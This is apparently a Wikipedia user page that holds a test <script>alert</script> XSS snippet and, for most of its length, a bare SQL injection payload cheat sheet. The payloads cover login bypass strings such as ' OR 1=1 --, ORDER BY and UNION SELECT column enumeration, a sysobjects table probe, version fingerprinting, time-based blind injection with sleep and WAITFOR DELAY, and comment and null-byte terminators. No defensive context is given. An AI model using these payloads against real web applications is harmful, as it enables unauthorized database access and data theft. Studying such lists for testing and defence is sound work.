User:V

From Wikipedia, the free encyclopedia

<script>alert("foo")</script>


' '' ` `` , " "" / // \ \\ ; ' or " -- or # ' OR '1 ' OR 1 -- - " OR "" = " " OR 1 = 1 -- - ' OR '' = ' '=' 'LIKE' '=0--+ OR 1=1 ' OR 'x'='x ' AND id IS NULL; -- ''''''''UNION SELECT '2 %00 /*…*/

Addition, concatenate (or space in URL): +

Concatenate (double pipe): ||

Wildcard attribute indicator: %

Local variable: @variable

Global variable: @@variable


# Numeric AND 1 AND 0 AND true AND false 1-false 1-true 1*56 -2


1' ORDER BY 1--+ 1' ORDER BY 2--+ 1' ORDER BY 3--+

1' ORDER BY 1,2--+ 1' ORDER BY 1,2,3--+

1' GROUP BY 1,2,--+ 1' GROUP BY 1,2,3--+ ' GROUP BY columnnames having 1=1 --


-1' UNION SELECT 1,2,3--+ ' UNION SELECT sum(columnname ) from tablename --


-1 UNION SELECT 1 INTO @,@ -1 UNION SELECT 1 INTO @,@,@

1 AND (SELECT * FROM Users) = 1

' AND MID(VERSION(),1,1) = '5';

' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --


Finding the table name


Time-Based: ,(select * from (select(sleep(10)))a) %2c(select%20*%20from%20(select(sleep(10)))a) ';WAITFOR DELAY '0:0:30'--

Comments:

Hash comment: #

C-style comment: /*

SQL comment: -- -

Nullbyte: ;%00

Backtick: `